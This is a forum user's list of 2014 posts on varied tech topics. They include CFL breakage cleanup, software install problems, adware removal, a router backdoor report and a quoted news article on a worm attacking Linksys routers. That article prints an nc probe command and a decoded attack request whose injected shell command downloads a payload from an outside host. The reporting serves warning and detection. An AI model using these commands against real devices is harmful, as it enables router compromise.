topbanner_forum
  *

avatar image

Welcome, Guest. Please login or register.
Did you miss your activation email?

Login with username, password and session length
  • Friday April 26, 2024, 6:18 pm
  • Proudly celebrating 15+ years online.
  • Donate now to become a lifetime supporting member of the site and get a non-expiring license key for all of our programs.
  • donate

Show Posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.


Topics - IainB [ switch to compact view ]

Pages: prev1 2 3 4 [5] 6 7 8 9 10 ... 16next
101
Posted across from CNET as a warning and for information/use of other DC denizens - especially relevant if they, like me, have young children.
I thought CNET's advice (copied below) was a tad excessive, but not after I did some fact-checking on this. I actually had not realised that these bulbs had that much mercury in them. Mercury is highly toxic and accumulates in the body. Whilst it is presumed to be safe (trapped) in mercury amalgam tooth fillings, having free mercury or its compounds in the environment is quite a different matter. I am all for low-energy lightbulbs for reasons of energy conservation and minimising overall power consumption costs. I have them all over the house, and when they have been broken, I would just sweep the bits up and throw them in the trash without a second's thought. I'm kicking myself now.
The advice at the end of the CNET post seems pretty sensible. (However, I now feel like I've been conned  by the lightbulb manufacturers.)

Having had some close calls with toxic environments myself, I apologise that I did not draw attention before to the risks, but I had completely overlooked them as I thought they were probably alarmist when I was posting an item in the Basement which included this:
From an interview with Prof Les Woodcock in the Yorkshire Evening Post.
...He adds: “Light bulbs are a good example of the contradiction with the green movement. Europe has outlawed the tungsten lightbulb. Tungsten is a harmless metal, like gold, it does not react with anything and yet now, in the name of conserving energy, we have low energy light bulbs full of toxic chemicals, including mercury vapour, which is poisonous. If you smash a low energy lightbulb, the advice from the Department for the Environment is to vacate the room for 15 minutes.

The Environment Agency website has this to say on low energy lightbulbs: “Energy saving light bulbs and fluorescent light tubes contain small amounts of mercury... mercury is a hazardous substance, these lightbulbs should be disposed of in accordance with hazardous waste regulations.”...

Here's the CNET post:
(Copied below sans embedded hyperlinks/images.)
How to clean up a broken CFL bulb
If a fluorescent light comes crashing down onto your kitchen floor, releasing the mercury trapped within, you don't need to panic. Just follow these steps to safely get things cleaned up.

    by Ry Crist   @rycrist    24 June 2014, 8:23 AM AEST

Fluorescent lights get their glow from the mercury trapped inside, and the compact fluorescents (CFLs) used for energy efficient household lighting are no different. So what do you do when one of these bulbs breaks, releasing that toxic mercury into your home?

First things first, you don't need to panic. While mercury is nothing to play around with, the amount contained inside a standard CFL is only about 1 percent of the amount that you'll find inside an old-fashioned mercury thermometer. Still, to be safe, you'll want to be sure that you clean the mess up correctly -- here's how to do just that, per EPA standards.

broken-cfl-2.jpg Colin West McDonald/CNET

Step one: Air out the area
As soon as that bulb breaks, you'll want to let the room air out for about 15 minutes. Get everyone out (especially pets, who might be inclined to investigate the mess), then open the windows and shut the doors. You'll also want to be sure and turn off your central air -- the last thing you want is to circulate that mercury throughout your home.

Step two: Find a sealable container
While you're avoiding the area in question, go ahead and take a moment to find something capable of containing that broken bulb. A glass jar with a metal lid is ideal, but if you don't have one handy, a plastic food container or even a sealable plastic bag will do the trick.

Step three: Pick up the pieces
You'll be tempted to sweep everything up with a broom -- but don't. Anything that rifles through the broken bits of your bulb is going to risk mercury contamination. You'll also want to be sure not to use your vacuum, as doing so will risk kicking mercury back up into the air.

The best bet is to carefully scoop up the larger bits of glass with a piece of paper or cardboard, something you can easily dispose of along with the broken bulb. Once the big pieces are up, try using a piece of duct tape to easily lift the tinier bits, along with any white powder that you see. You could also use a piece of bread -- just don't eat it afterwards.

img3724.jpg
Seal the broken bulb and everything you used to pick it up. A glass jar is best, but a plastic container like this one will work, too. Ry Crist/CNET

Step four: Wipe the floor clean
Once you've gotten the glass up off of the floor, you'll need to wipe things down with a damp paper towel. You'll want to go over the area fairly liberally, making sure not to leave any of that white powder from the bulb behind.

Once you're done, add that used paper towel to the container with the paper, the tape, and the broken glass. Go ahead and seal it up, then take it outside. Now would also be a good time to thoroughly wash your hands with soap and water.

Step five: Let the room air out for another few hours
You've gotten the floor spic and span, but there still might be trace amounts of mercury vapor left in the air. If you're able to, leave the windows open and the air conditioning off for another couple of hours. Better safe than sorry, right?

capture.jpg
Your local government's website should have info on where you can take your broken bulbs. LouisvilleKY.gov

Step six: Dispose of the broken bulb
Depending on your local regulations, you might not be required to take the broken bulb to a recycling center. It's a good idea nonetheless, as you don't want that mercury sent off to a landfill, where it might slowly leech into the ground. The waste management section of your local government's website should have info on which facilities will take hazardous household materials off of your hands.

Here in Louisville, Ky., there's only one place for residents to take broken CFLs -- and it's only open two days a week. If you're in a situation like this, it's fine to hang on to that sealed up wreckage for a few days -- just be sure to keep it outside.

cfl.jpg Ry Crist/CNET

If this all sounds too high maintenance for your tastes, then know that you have other options. LEDs offer better energy efficiency, longer lifespans, and zero mercury inside the bulbs. If the higher price tag is a deal breaker, then consider halogens. The gas each one uses to prolong the bulb's lifespan is totally harmless. A broken CFL might be an annoying chore to deal with, but it's also an opportunity to upgrade to a bulb that's a better fit for your home.

102
I have documented these notes here in case they could be useful or of help to someone else.
A few days ago I got a new (refurbished) Toshiba Satellite L855D laptop, which came installed with Win8 +IE9.
I ran it through numerous Windows Updates, and that got it an up-to-date Win8+IE10.
In the process of setting up Firefox and IE10 to suit my needs, I encountered a problem - LastPass installed and worked fine in Firefox (latest ß version), and installed fine in IE10, but it but repeatedly crashed IE10 when I tried to sign on to LastPass.

I spent quite a bit of time looking for a possible solution on the Internet and in LastPass' knowledge base, but found none.
So I posted a problem ticket in LastPass support:
LastPass repeatedly crashes IE10 as soon as I log in to LastPass - using IE10, Win8. Lastpass is thus unusable in IE10.

Error message:
-------------------------------
Microsoft Visual C++ Runtime Library
C:\Program Files\Internet Explorer\iexplore.exe

This application has requested the Runtime to terminate it in an unusual way.
Please contact the application's support team for more information.
-------------------------------

LastPass support updated the ticket with this:
Hello,
Thank you for contacting LastPass Support and we do apologize for the inconvenience it may have caused you.

Please update your Internet Explorer to the current version here: http://windows.micro...-worldwide-languages

Best,
Jonathan
_______________________

This would have necessitated my upgrading from Win8 to Win8.1, and I wasn't able to do that because of another (apparently common) problem. In any event, I could not see the need to update.
Not happy with this, I posted a comment to the ticket asking LastPass support to confirm whether LastPass supported Win8+IE10.
A deafening silence ensued.

So I did some more fossicking about in Internet forums and eventually came up with several comments that said that:
LastPass does not work in IE10 in Win8 because IE10 starts up in "No Addons" mode (when started from the Start menu). The workaround is to start up IE10 from the cmd box, and then LastPass works correctly in IE10.
_______________________

So, I tried that out, and LastPass worked just fine in IE10.
 
My feedback to the LastPass ticket:
Case can be closed: I discovered that LastPass does not work in IE10 in Win8 because IE10 starts up in "No Addons" mode. The workaround is to start up IE10 from the cmd box, and then LastPass works a treat in IE10.
Come on - you guys really would/should have known this better than me, so your advice to upgrade to Win8.1 was rubbish.
I used to manage an IT HelpDesk for HP. If someone had made this kind of mistake in my team, they would have been put through a retraining programme.
_______________________

103
DC Gamer Club / Broforce ("Bro Force")
« on: May 11, 2014, 04:40 AM »
My 3¾ y/o son likes hunting for games on the Internet. He turns up some really interesting online ones - BubbleHit, PapaLoui2 being two really addictive examples - and which you could download to your PC and play/save their levels and restore/return to them later. A while back, he found one called Broforce - a free prototype that now seems to be appearing as a paid development or something, on Steam (?).
The prototype ("brototype") was on different free-to-play-sites - one example is http://www.silvergames.com/broforce
This Broforce downloads as a 37.7Mb file game.unity3d and plays via a Firefox plugin.

Broforce is an amazingly addictive and fun game - lots of shooting, violent explosions, splatter, baddies, etc. and with hugely tongue-in-cheek references to American movie heroes. My daughter and I started to play it with my son because he wasn't dexterous enough to play it at first, and the levels get harder the higher you go. He's now pretty impressive at it, and we are all addicted to it.
We are stuck, unable to get past a very high level (they are not numbered), where a  flying gunship hovers around blasting you to smithereens whether you are on the surface or underground.

Any pointers to tactics/hacks/cheats to get past this level - assuming there is another level - would be welcome.

104
Living Room / Malware removal - PUP.Optional.CrossRider.A
« on: April 30, 2014, 02:18 AM »
Posted as a warning and for information/use of other DC denizens.

Following a link in Lifehacker, oCam Supercharges Screen Capture in Windows, I went to the oCam developer's website at http://www.ohsoft.net. There I found they had 4 products:
  • oCam
  • VirtualDVD
  • CoffeeZip
  • SecretFolder

I downloaded and installed oCam (it was a straightforward silent install), as that was what I was primarily interested in, and took a look at the other 3 items, downloading VirtualDVD as that looked like it could be useful to me.
I gave oCam a quick try out, and it seemed to do what it was designed for rather well.
I then turned my attention to something else and opened up IE11 (this is on a laptop with Win7-64 Home Premium), and saw that the default page was what looked like a search page hijack for unifinder.net.
At the bottom of the page there was a box with small type in it that said:
You can change the search engine using the PageUp, PageDown key and Mouse Wheel.
 * If keyword is the URL address, we will go directly to the site. ;)
 * [100% Freeware] Screen Recorder / DVD-ROM emulator / File Archiver / Hide Folder Download   
Copyright Ohsoft.net All Right Reserved
After a bit of experimentation, I recognised that the search page was a trojan hijack - i.e., it persisted between IE sessions and could not be deleted. It kept recreating itself as file unifinder.em[1].js.
Fearing the worst, I set MBAM (Malwarebytes PRO) on a scan, and it took a few minutes to come up with a report that 8 folders and 60 files had been infected with (PUP.Optional.CrossRider.A). The infected items were quarantined and deleted, necessitating what MBAM said was an "urgent" reboot of the laptop (some of the malware had been running in RAM).
After reboot, I re-ran the MBAM scan (better safe than sorry) and then turned my attention to the IE start page, which still had the persistent unifinder.net page. I eventually figured out that if I set another website page as the start page instead, and shredded the file unifinder.em[1].js, then the problem was cleared.

I then did a DuckGo search on (PUP.Optional.CrossRider.A), and discovered that "PUP" stands for "Potentially Unwanted Program". I ran MBAM and MS Security Essentials over the installer files for oCam and VirtualDVD, but they both came up "clean". I shredded both files and added some notes to avoid them, to my OneNote Notebook.

The DuckGo search on (PUP.Optional.CrossRider.A) also came up with an interesting post at fixpcyourself.com about a variant of it - Remove PUP.Optional.Cgminer Virus
Another learning experience.

EDIT 2014-04-30 2332hrs:
By the way, as a precaution I did of course expunge every last trace of oCam, and as a result of this experience I would strongly recommend that you never download the thing. I certainly wouldn't touch it with a bargepole again. There is, after all, such a thing as a failure of trust.

105
Living Room / Intentional Backdoor In Consumer Routers Found
« on: April 22, 2014, 04:57 AM »
Well, this is a surprise!
Intentional Backdoor In Consumer Routers Found
New submitter janoc (699997) writes about a backdoor that was fixed (only not).
"Eloi Vanderbeken from Synacktiv has identified an intentional backdoor in a module by Sercomm used by major router manufacturers (Cisco, Linksys, Netgear, etc.). The backdoor was ostensibly fixed — by obfuscating it and making it harder to access. The original report (PDF). And yeah, there is an exploit available ..."
Rather than actually closing the backdoor, they just altered it so that the service was not enabled until you knocked the portal with a specially crafted Ethernet packet. Quoting Ars Technica:
"The nature of the change, which leverages the same code as was used in the old firmware to provide administrative access over the concealed port, suggests that the backdoor is an intentional feature of the firmware ... Because of the format of the packets—raw Ethernet packets, not Internet Protocol packets—they would need to be sent from within the local wireless LAN, or from the Internet service provider’s equipment. But they could be sent out from an ISP as a broadcast, essentially re-opening the backdoor on any customer’s router that had been patched."

106
A couple or so weeks back, I fell asleep holding a mug of tea, spilling tea on my lap and on my daughter's 3 y/o DELL Triple-Core M501R laptop, killing the laptop and HDD.    :-[      :down:
Yes, I know. In one of my first jobs in IT, if you went into the computer room with food, drink or were smoking, you were instantly dismissed and escorted off the premises by two security personnel (it was a a big hush-hush operation with very strict rules about security risks.)
So I cannibalised an old 32-bit DELL Inspiron (with Intel Centrino Duo) which had a failed hard drive (OS=Vista Basic), and swapped in a 120GB hard drive from an old Toshiba (XP) laptop. Then I installed Windows Ultimate on the DELL and proceeded to go through about 150+ updates via Windows Update.
Then I try to install the next update - SP1. But it won't work, as the install says it does not support the operating system. The install for IE8 (the laptop has IE7) also says it does not support the operating system. Hmm.
A lot of mucking about ensued, with no progress. Double-checked everything.
I checked all the reports from the OS. They told me that it is definitely Vista Ultimate. The SP1 update pack and IE8 update pack are definitely OK for Vista Ultimate.
So what gives?

Peeking inside using X-Setup Pro v9.2.100, one of the plugins reported that there is a flag set which indicates that this laptop is a "Type XP" computer. There are around 9 different "Types" - one of them is Vista. I can't find out (looked in the Registry) where this flag is set. The setting is not editable, but I edited the plugin to change the reported flag setting - to see if it made any difference. It didn't.
So I log in to my DELL account and install a lot of the DELL standard software and drivers for this DELL laptop's TAG/build, hoping that will convince the OS that it is "Type Vista". All goes well on the installs, but it doggedly remains "Type XP" and the update packs still objected.
As I had by this time been up all night and the next day on this case, I put the laptop into sleep mode, closed the lid, and went to sleep myself. When I woke up, the laptop was ON and felt a bit hot to the touch, lid still closed (it has a latch). I open it up and everything seems normal/OK, with no indication as to what woke it up. I dismissed it, suspecting my 3½ y/o, and then played around a bit more with the DELL software, and went to restart the laptop via the Start menu - but there was a new little icon on the Vista shutdown button, with a popup on mouseover to the effect that "Switch off and enable update to install". So I pressed that.
The screen showed usual/normal logoff steps, and then displayed a light blue Vista background with something like: "Please do not switch off or remove power from the computer. Update in progress. Installing update 1 of 1..." - with a revolving orb and moving dots and an intermittent disk activity light all indicating that something was happening.
I guessed that with my messing about it could well be - finally! - doing the SP1 update install.
So I left it alone.

The downloaded SP1 update package filesize was either (from memory) approx 430Mb (for the 5 language install) or 640Mb (for the 36 language install). After the Windows Update had downloaded SP1 but failed to install it, I had downloaded both and tried to get them to install, but with no joy. I suspect that the laptop must have woken up on a scheduled start, and was installing the SP1 update package that it had already saved to disk in the earlier (failed) attempt via the Windows Update.

That was at about 7PM last night.
It is now about 21hrs later and within the last hour or so (I haven't been keeping a close eye on it), the screen has started to display a new message: "Shutting down..." - with a revolving orb and an intermittent disk activity light indicating that something is happening. (The screen goes dark but illuminates when the touchpad is touched, whereupon one can read the message.)

I wondered whether this is what passes for "normal" for an SP1 update to Vista Ultimate. The DC Forum doesn't have much on it, and neither do other forums, though they do seem to generally show that Vista is a bit of a nightmare to support.
Anyway, having come this far, I am reluctant to pull the plug, but really it does seem strange.

107
Originally posted:2014-04-15
Last updated2014-04-15

Basic Info
App NameRIPT - 00 very small.jpg  RIPT (shareable scrapbook-clipping program)
Thumbs-Up Rating :Thmbsup: :Thmbsup: :Thmbsup: :Thmbsup: :Thmbsup:
App URLOne of several download sites: http://ript.en.softonic.com/
OBSOLETE
http://www.ript.com
App Version ReviewedRIPT v.0.5.0218 (Freeware, 2007)
Test System SpecsWindows Vista Ultimate 32-bit
Supported OSesWindows
Support MethodsNone. (OBSOLETE product)
Upgrade PolicyNot applicable.
Trial Version Available?Freeware
Pricing SchemeNot applicable.

Intro and Overview:
RIPT is a shareable (with other RIPT users) scrapbook-clipping program.
I thought I'd publish a review of this forgotten, elegant program for those who (like me) might find an occasional - if not frequent - use for it. I don't really need it now, as I tend to use:

This screenshot (below) tells you all you really need to know about RIPT, if you want to get started using it:
(Click to expand image.)
RIPT - 01 brief review.jpg


Description: The quote below from Robert J. Calvano[ contains the text of the website referred to in the screenshot above, and gives the background to the RIPT project's development.
(Copied sans embedded links/images.)
Ript: Software Design & Development
Before there was ever such a thing as Pinterest, there was Ript.

"I want you to make an application that doesn't look or feel like an application." Those words, spoken by Oxygen's CEO Gerry Laybourne, guided the extremely talented Agile development team I worked on while we designed and developed Ript.  

Ript is (read was) a free Windows desktop application which was made available for download via the web. The target audience was women, age 18-45, that were smart, savvy, early adopters, shoppers and collaborators.  With our focus on women, we were driven to surpass their user experience expectations and created a useful tool that was playful and purposeful as well as simple, elegant and fun.

It mimics the acts of ripping, piling and arranging. It's part scrapbook, part visual to do list (or to buy list), part collaborative tool. You can drag and drop any type of image or text from an internet site, or your directory structure, and arrange all of your assets any way you see fit. Then share or print them.

We had tons of fun designing the application as well as collaborating with the TV department to create spots that captured the essence of the app (videos below).

We even brought in John Maeda to work with the team for a day, expand our thinking, and to give Ript a test drive.

After NBC Universal bought Oxygen, the project was left to rot on the vine. Then along came Pinterest.
________________________________________________

The Good:
Potentially a very useful little program. Seems to work flawlessly.

Needs Improvement:
(No notes on this. The software has apparently been abandoned and is not being maintained.)

Why I think you should use this product:
It might be just what you were looking for!

How it compares to similar products:
I know of nothing similar to RIPT.

Conclusions:
Could well be worth your giving it a quick trial.

108
I am trialling out a third-party product called Tabbles.
Tabbles is a sort of file tagging/categorisation tool that integrates with the Windows NTFS filing system. It can use either a proprietary Cloud-based database for the tag data, or Microsoft SQL Express.
I have installed Tabbles on a laptop with an i7 CPU, OS is Windows 7-64 Home Premium (Build 7601) with SP1, .NET Framework 4, and all updates up-to-date.
Currently, I am running the thing with Tabbles' proprietary Cloud-based database, but I want to run it with a local MS-SQL database.

Tabbles Wiki: says:
Tabbles 3 Requirement: Microsoft SQL Server
Tabbles 3 requires the .net framework 4 (this is installed by the installer) and the Microsoft SQL Server (the free version, called "Express" works just fine).

Installing the Microsoft SQL Server Express for single users
For single users, willing to use Tabbles on a single pc, installing the Microsoft SQL Server won't be too complicated. You can download the installer here [1]. The server should work
_____________________

I don't have any practical experience of installing SQL, but it seemed like it should be straightforward.
I checked that the system where the install was to take place met the pre-requisites.
However, it does not install.
There are these 3 most recent files/versions that I could find available for download re SQL 2012 Express:
(From: https://www.microsof...V2/enus/default.aspx )
  • 01. SqlLocalDB - (Local DB 64-bit).msi
  • 02. SQLEXPR_x64_ENU - (Express DB only 64-bit).exe
  • 03. SQLEXPRWT_x64_ENU - (Express + Tools 64-bit).exe

File 02 is the one I apparently needed. It goes into the install process just fine, but just as the progress bar gets to 100% it abends with the error message:
Microsoft SQL Server 2012 Service Pack 1 Setup
The operating system on this computer does not meet the minimum requirements for SQL Server
2012. For Windows Vista or Windows Server 2008 operating systems, Service Pack 2 or later is
required. For Windows 7 or Windows Server 2008 R2, Service Pack 1 or later is required. For more
information, see Hardware and Software Requirements for installing SQL Server 2012 at:
http://go.microsoft....wlink/?LinkID=195092
______________________

Trial-and-error:
  • Following the LinkID=195092 just leads me in circles (I had already established that the system where the install was to take place met the pre-requisites).
  • I tried installing File 01, and it installs (but is not of any use to me, I think).
  • I tried installing File 03, but that abended with the same error message as for File 02.
  • I tried installing what seemed to be an earlier version of the file 02 from another MS website, but that abended with the same error message as for File 02.
  • I tried DuckGo searches for problems with installing SQL 2012 Express, but could find nothing that helped or seemed close to the problem I was experiencing, or with a fix/workaround.
  • I have searched the DC Forum, but could not find anything that might help.
  • I have MySQL-for-Excel installed on the same laptop, and was unsure whether this could have been causing a conflict for the SQL Server 2012 install, but switching the MySQL off doesn't seem to make any difference to the latter install - File 02 it still abends with the same error message.

Having thus drawn a blank so far, I am posting this to see if there is anyone in the forum who could offer their practical experience of the installation of SQL 2012 Express or could suggest problem resolution re same.

109
Looks like Microsoft are about to change/disrupt the whole game for PIMs + Cloud services:
(Copied below sans embedded hyperlinks/images.)
OneNote now on Mac, free everywhere, and service powered | Office Blogs
March 17, 2014

When we started OneNote we set out to revolutionize the way people capture, annotate, and recall all the ideas, thoughts, snippets and plans in their life. As many of you have attested, OneNote is the ultimate extension for your brain, but it’s not complete if it’s not instantly available everywhere. We’ve already made a lot of progress in that direction with our mobile, tablet and online web experiences. But there was still a gap. People frequently asked us for OneNote on Mac, and for more ways to capture content.

Today we’re excited to complete that story with three major developments:
  • 1. OneNote for Mac is available for the first time and for free. With this, OneNote is now available on all the platforms you care about: PC, Mac, Windows tablets, Windows Phone, iPad, iPhone, Android and the Web. And they’re always in sync.

  • 2. OneNote is now free everywhere including the Windows PC desktop and Mac version because we want everyone to be able to use it. Premium features are available to paid customers.

  • The OneNote service now provides a cloud API enabling any application to connect to it. This makes it easier than ever to capture ideas, information and inspirations from more applications and more places straight into OneNote, including:
    • OneNote Clipper for saving web pages to OneNote
    • [email protected] for emailing notes to OneNote
    • Office Lens for capturing documents and whiteboards with your Windows Phone
    • Sending blog and news articles to OneNote from Feedly, News360 and Weave
    • Easy document scanning to OneNote with Brother, Doxie Go, Epson, and Neat
    • Writing notes with pen and paper and sending them to OneNote with Livescribe
    • Mobile document scanning to OneNote with Genius Scan and JotNot
    • Having your physical notebooks scanned into OneNote with Mod Notebooks
    • Connecting your world to OneNote with IFTTT

Go to www.onenote.com to get OneNote for free for your Mac, PC or other devices, and try out the new OneNote service connected experiences.
... (Read the rest at the link.)

This also would seem to be relevant to the DC Forum discussion threads:

CAUTION: Note the use of the cliché "...we're excited...". Google worked that one to death - e.g., especially with WAVE (remember that?).

110
Just received this email update from Khan Academy:
Exciting news: we’re partnering with the College Board so that all students who want to go to college can prepare for the SAT at their own pace, at no cost.

The College Board just announced that they’re redesigning the SAT for 2016, and we’re partnering with them to make free, world-class prep materials. Know anyone preparing for the SAT? Let them know:

or forward them this email

By spring 2015, students will have access to state-of-the-art, interactive learning tools that give them deep practice and help diagnose their gaps. All of this will be created through a close collaboration with the College Board specifically for the redesigned SAT. Stay tuned.

In the meantime, students taking the SAT in 2014/15 can start practicing today with hundreds of previously unreleased Math, Reading, and Writing questions from real SATs and more than 200 videos that show step-by-step solutions to each question:

Learn more about our SAT prep: www.khanacademy.org/sat

Our goal is nothing short of leveling the playing field for every student taking the SAT, so please help us reach as many people as possible.

Let's do this!

Elizabeth
Content Lead at Khan Academy

PO Box 1630, Mountain View, CA 94042

P.S. Anyone who needs to prepare for the SAT will be able to do so on Khan Academy for free. If you know anyone thinking about taking the SAT, share the news today.

111
Thought I'd post this from the zabkat.com blog (home of xplorer²) in case anyone on the forum might be interested helping out in ß testing on this new approach to search:

(Copied below sans embedded hyperlinks/images.)
DeskRule: A new kind of desktop search engine is born

Nowadays it is amazing how much information there is in your everyday documents. Take your photos for example, the "new" property system introduced with windows vista has no less than 86 properties for photos, and that's not counting the GPS geo-location information also available for pictures. Modern phones and advanced cameras add all this information in EXIF and XMP tags and the property system distills such tags into standard properties.

You may argue that if you own just the one camera you are not interested in the System.Photo.CameraModel property. Most of these are just for professional photographers. But how about searching for pictures with particular people in them? Say pictures of your daugter? This is possible because windows exposes automatic face recognition data inserted by your advanced camera or photo software in System.Photo.PeopleNames property. Likewise you can search by GPS coordinates to find pictures taken at some particular location, e.g. your latest trip in australia. Isn't it a waste of information when you only search by name?

The most powerful search tools of today — even xplorer² — are stuck using traditional shell column handlers which only expose around a third of the available properties. That is why we went ahead and wrote from scratch a new kind of search tool that taps into all the available properties, for photos, media and documents. It also offers traditional name/date/text content search. Its name is DeskRule and today you can have a go trying its capabilities.

This is pretty much work in progress but it has reached a point where it is a usable search engine so we are presenting it to you for your feedback and beta testing, which will help decide the future of its development.

Click to download DeskRule (free beta version, 500 KB)

Minimum requirements: windows Vista or later
   deskrule main window

DeskRule is still rough around the edges and rather slow, but things will improve in the near future. Unlike xplorer² which does "everything and the kitchen sink" file management, this is going to be a tool focused on just one thing, searching for files and folders. The general ideas are:

    Search everywhere. Wherever you have files DeskRule can locate them; not just normal folders, but also in mobile phones and cameras, zipfolders, FTP and all the other virtual folders available in the shell namespace.
     
    Use all item properties. Some 300 (windows 8) unique system properties are available to be used as search parameters, both simple (name, date modified, file contents) and more advanced like Rating, Tags, Authors, even GPS.Longitude.
     
    Powerful search expressions. Search rules are individually powerful supporting regular expressions, and can be combined in complex search statements (boolean algebra) e.g. you could search for files with pin-point accuracy like:
    name="report" AND NOT (date="last month" OR rating="4 stars")

Here is a demo video: play

Your comments and suggestions (or bug reports) are very much appreciated, thanks!

112
Just stumbled upon this - it was referred to in the latest SourceForge.net Update [email protected]

Looks rather interesting:
Programming Without Coding Technology
PWCT is a general-purpose visual programming tool  designed for novice and expert programmers.    A novice programmer can use PWCT to learn programming  concepts like Data Structure, Control Structure, Programming Paradigm,..etc.  An expert programmer can use PWCT to develop large and/or complex software.

See also their website: http://doublesvsoop.sourceforge.net/

113
Thought I'd post this in case anyone on the forum might be interested and able to take advantage of the opportunity to learn more about what people may have done using Deming's suggestions for "transformation" of business. A pity they only hold these seminars in the US. I've never attended one yet, but I'd still love to go. I see they are going to touch on operations research too.
One of the most useful and life-changing experiences for me was attending one of Deming's 4-day seminars. He said that what he was telling us about was actually very simple, but that it seemed hard to understand as a lot of it seemed to go against conventional wisdom - what we had been taught or indoctrinated with - and so was difficult to accept/internalise. He was right.
When I finally got to understanding what he was on about, I started to employ his approach and methods in my business as an IT and management consultant, and it led to assignments that were successfully completed, made me a lot of money, got repeat business (assignments), and got me a reputation for being something of a business process wizard - when in fact, all I had been doing was correctly applying tested theory and good/"best" practice, and Deming's approach and methods.

Read more about it at the link.
(Copied below sans embedded hyperlinks/images.)
20th Annual International Deming Research Seminar
March 3-4, 2014 : New York, NY USA

The Deming Institute is a proud Co-Sponsor of this exchange of knowledge

Experts in healthcare and education, as well as practitioners in government, manufacturing, and service industries will reveal their findings for the first time in two days of presentations, exchanges, and roundtables with other academics and practitioners who gather from around the world to share their ideas and explore Dr. W. Edwards Deming’s theory of management in a wide-ranging context. The forum is The 20th Annual International Deming Research Seminar, March 3-4 in New York City.

Be among the first to learn of a new direction in management and operations research.

Hear the latest ideas on use of incentives, sustaining company success, performance management systems, enhancing commerce, teams, appraisals, measurement systems, fear, trust, ethics, and leadership.

Student Discount (Student ID Required) is available through The Deming Cooperative.

No refunds within 10 days of the event, 50% refund 11 - 30 days prior to event. Substitutions always welcome.
Event Pricing:    Regular: $395

114
This could affect a lot of unsuspecting Linksys router users. (I used to use a Linksys WRT120N, which apparently could be a potential target for this worm.)

(ArsTchnica post copied below sans embedded hyperlinks/images.)
Bizarre attack infects Linksys routers with self-replicating malware
Some 1,000 devices have been hit by the worm, which seeks out others to infect.
by Dan Goodin - Feb 13, 2014 6:20 pm UTC

Researchers say they have uncovered an ongoing attack that infects home and small-office wireless routers from Linksys with self-replicating malware, most likely by exploiting a code-execution vulnerability in the device firmware.

Johannes B. Ullrich, CTO of the Sans Institute, told Ars he has been able to confirm that the malicious worm has infected around 1,000 Linksys E1000, E1200, and E2400 routers, although the actual number of hijacked devices worldwide could be much higher. A blog post Sans published shortly after this article was posted expanded the range of vulnerable models to virtually the entire Linksys E product line. Once a device is compromised, it scans the Internet for other vulnerable devices to infect.

"We do not know for sure if there is a command and control channel yet," Ullrich wrote in the update. "But the worm appears to include strings that point to a command and control channel. The worm also includes basic HTML pages with images that look benign and more like a calling card. They include images based on the movie "The Moon" which we used as a name for the worm."

The worm works by injecting vulnerable devices with a URL-encoded shell script that carries out the same seek-and-hijack behavior. The exploit may also change some routers' domain name system server to 8.8.8.8 or 8.8.4.4, which are IP addresses used by Google's DNS service. Compromised routers remain infected until they are rebooted. Once the devices are restarted, they appear to return to their normal state. People who are wondering if their device is infected should check for heavy outbound scanning on port 80 and 8080, and inbound connection attempts to miscellaneous ports below 1024. To detect potentially vulnerable devices use the following command:

echo "GET /HNAP1/ HTTP/1.1\r\nHost: test\r\n\r\n" | nc routerip 8080

Devices that return the XML HNAP output may be vulnerable.

The attack begins with a remote call to the Home Network Administration Protocol (HNAP), an interface that allows ISPs and others to remotely manage home and office routers. The remote function is exposed by a built-in Web server that listens for commands sent over the Internet. Typically, it requires the remote user to enter a valid administrative password before executing commands, although previous bugs in HNAP implementations have left routers vulnerable to attack. After using HNAP to identify vulnerable routers, the worm exploits an authentication bypass vulnerability in a CGI script. (Ullrich isn't identifying the script because it remains unfixed on many older routers, and he doesn't want to make it easier for attackers to target it.) Ullrich said he has ruled out weak passwords as the cause of the Linksys infections.

So far, the only routers Ullrich has observed being compromised in the attack are the E1000, E1200, and E2400 models manufactured by Linksys. Routers running the latest 2.0.06 version of the firmware aren't being infected, leading him to believe that the vulnerability resides only in earlier versions. Unfortunately, no update is available for E1000 models, since they are no longer supported.

Infected devices are highly selective about the IP ranges they will scan when searching for other vulnerable routers. The sample Ullrich obtained listed just 627 blocks of /21 and /24 subnets. The net blocks appear to be targeting various consumer DSL and Cable ISPs worldwide, including Comcast, Cox, Roadrunner, RCN, and Charter in the US. The sample also scanned ranges owned by Bell (DSL) and Shaw (cable) in Canada, Virtua and Telesp in Brazil, RDSNET in Romania, Ziggo in the Netherlands, and Time.Net in Malaysia.

The discovery comes a week after researchers in Poland reported an ongoing attack used to steal online banking credentials, in part by modifying home routers' DNS settings. In turn, the phony domain name resolvers listed in the router settings redirected victims' computers, tablets, and smartphones to fraudulent websites masquerading as an authentic bank service; the sites would then steal the victims' login credentials. Ullrich said that the worm campaign he helped uncover this week appears to be unrelated, since there are no malicious DNS changes involved.

So why might the new attack, in select cases, redirect a router's DNS requests to Google? That remains unclear, though one theory suggests that the changes could allow attackers to bypass DNS policies enforced by specific ISPs.
Consuming bandwidth

The worm came to light earlier this week after the operator of a Wyoming ISP contacted Sans and reported a large number of customers with compromised Linksys routers. As the routers scanned IP ports 80 and 8080 as fast as they could, they consumed the bandwidth of the unidentified ISP's customers, slowed down their legitimate activity, and interrupted streams and VPN connections.

In a comment left in response to this article, ISP operator Brett Glass said the range of devices that are vulnerable is likely much wider than previously determined. He explained:

    The security exploit that's used by the worm will work on all current and recent Linksys routers, including the entire E-series as well as Valet routers and some with "WRT" part numbers (for example, the WRT160). However, this particular worm seems to focus on the E-series and appears to be aimed at marshaling a botnet. So far, it does not appear that the malware flashes itself in, so it can be removed by a reboot. But it appears that any router with stock firmware that's exposed to the Internet can be reinfected even if it has a secure password.

The initial request in the attack typically begins with the strings "GET /HNAP1/ HTTP/1.1" and then "Host: [ip of host]:8080." The following requests look like this:

POST /[withheld].cgi HTTP/1.1
Host: [ip of honeypot]:8080
User-Agent: Mozilla/4.0 (compatible; MSIE 4.01; Mac_PowerPC)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://[ip of honeypot]:8080/
Authorization: Basic YWRtaW46JmkxKkBVJDZ4dmNH

When decoded, the request is translated to:

submit_button=&change_action=&submit_type=&action=&commit=0&ttcp_num=2&ttcp_size=2
&ttcp_ip=-h
    `cd /tmp;if [ ! -e .L26 ];then wget http://[source IP]:193/0Rx.mid;fi`
&StartEPI=1

Further Reading
Guerilla researcher created epic botnet to scan billions of IP addresses

